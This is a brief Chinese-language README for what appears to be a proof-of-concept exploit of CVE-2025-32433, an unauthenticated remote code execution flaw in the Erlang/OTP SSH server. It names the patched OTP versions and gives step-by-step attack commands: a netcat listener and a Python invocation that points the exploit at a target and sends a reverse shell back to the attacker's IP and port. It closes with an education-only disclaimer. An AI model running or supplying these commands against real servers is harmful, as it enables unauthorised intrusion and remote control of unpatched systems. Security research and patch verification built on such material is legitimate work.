PoC展示了在Erlang/OTP SSH服务器中未经认证的远程代码执行。通过利用SSH协议消息处理中的缺陷,攻击者可以在没有有效凭证的情况下在目标上执行任意命令。
该问题已在OTP-27.3.3、OTP-26.2.5.11和OTP-25.3.2.20中修复。
监听器设置:
nc -lvnp 1234
运行利用程序:
python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
--rhost : 目标IP--rport : 目标SSH端口--lhost : 用于反弹Shell的你的IP--lport : 你的监听端口

此仓库仅供教育目的使用。请勿对不属于自己或未经明确授权测试的系统使用此利用程序。滥用可能违法且被严格禁止。